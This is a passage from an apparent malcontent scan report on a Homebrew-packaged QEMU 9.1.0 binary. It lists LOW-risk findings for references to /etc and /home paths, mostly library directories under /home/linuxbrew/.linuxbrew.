[/home/linuxbrew/.linuxbrew/opt/libxkbfile/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbfile%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxml2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxml2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxmu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxmu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrandr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrandr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrender/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrender%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxshmfence/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxshmfence%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxtst/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxtst%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxv/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxv%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxxf86vm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxxf86vm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/llvm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fllvm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lm-sensors/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flm-sensors%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lz4/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flz4%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lzo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flzo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa-glu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa-glu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mpdecimal/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmpdecimal%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/nettle/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fnettle%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/openssl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fopenssl&type=code)
[/home/linuxbrew/.linuxbrew/opt/p11-kit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fp11-kit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pango/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpango%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pcre2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpcre2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pixman/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpixman%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/python](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpython&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/snappy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsnappy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-llvm-translator/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-llvm-translator%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-tools/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-tools%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/systemd/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsystemd%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/unbound/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Funbound%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/util-linux/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Futil-linux%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/valgrind/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvalgrind%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/vde/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvde%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/wayland/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fwayland%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-image/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-image%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-keysyms/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-keysyms%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-renderutil/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-renderutil%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-wm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-wm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xkbcomp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxkbcomp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xorg-server/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxorg-server%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/z3/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fz3%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/sbin/samba-dot-org-smbd](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fsbin%2Fsamba-dot-org-smbd&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/qemu/qemu.conf](https://github.com/search?q=%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/etc/qemu-ifdown](https://github.com/search?q=%2Fetc%2Fqemu-ifdown&type=code)
[/etc/qemu-ifup](https://github.com/search?q=%2Fetc%2Fqemu-ifup&type=code) | +| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/libexec/qemu-bridge-helpe](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Flibexec%2Fqemu-bridge-helpe&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/qemu-firmware](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Fqemu-firmware&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu/qemu.conf](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifdown](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifdown&type=code)
[/home/linuxbrew/.linuxbrew/opt/gsettings-desktop-schemas/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgsettings-desktop-schemas%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifup](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifup&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/icons](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Ficons&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-llvm-translator/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-llvm-translator%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-renderutil/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-renderutil%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-keysyms/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-keysyms%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/sbin/samba-dot-org-smbd](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fsbin%2Fsamba-dot-org-smbd&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-image/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-image%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/bin](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fbin&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/var](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fvar&type=code)
[/home/linuxbrew/.linuxbrew/opt/at-spi2-core/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fat-spi2-core%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libpciaccess/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibpciaccess%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libunistring/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibunistring%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbcommon/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbcommon%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxshmfence/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxshmfence%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxinerama/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxinerama%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-tools/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-tools%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-wm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-wm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xorg-server/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxorg-server%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fontconfig/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffontconfig%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gdk-pixbuf/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgdk-pixbuf%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/jpeg-turbo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fjpeg-turbo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libfontenc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibfontenc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnghttp2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnghttp2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdamage/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdamage%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbfile/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbfile%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrender/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrender%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxxf86vm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxxf86vm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lm-sensors/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flm-sensors%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/util-linux/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Futil-linux%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/graphite2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgraphite2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap-ng/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap-ng%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfixes/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfixes%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfont2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfont2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrandr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrandr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mpdecimal/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmpdecimal%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/binutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbinutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/capstone/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcapstone%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/elfutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Felfutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freeglut/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreeglut%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freetype/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreetype%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/harfbuzz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fharfbuzz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libepoxy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibepoxy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libevent/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibevent%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libslirp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibslirp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtasn1/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtasn1%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtirpc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtirpc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libvdpau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibvdpau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdmcp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdmcp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa-glu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa-glu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/valgrind/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvalgrind%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/berkeley-db](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fberkeley-db&type=code)
[/home/linuxbrew/.linuxbrew/opt/fribidi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffribidi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glslang/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglslang%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libedit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibedit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libidn2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibidn2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtiff/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtiff%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcvt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcvt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxext/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxext%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxml2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxml2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxtst/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxtst%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/p11-kit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fp11-kit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/systemd/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsystemd%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/unbound/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Funbound%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/wayland/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fwayland%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xkbcomp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxkbcomp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gnutls/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgnutls%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libdrm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibdrm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libffi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibffi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libice/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibice%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnsl/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnsl%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libssh/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibssh%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libusb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibusb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libx11/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibx11%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxmu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxmu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/nettle/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fnettle%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pixman/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpixman%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/snappy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsnappy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/bzip2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbzip2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/cairo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcairo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/expat/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fexpat%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/icu4c/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ficu4c%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libsm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibsm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libva/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibva%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxv/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxv%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pango/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpango%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pcre2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpcre2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/attr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fattr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dbus/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdbus%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglib%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/krb5/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fkrb5%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/llvm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fllvm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dtc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdtc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gmp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgmp%2Flib&type=code)
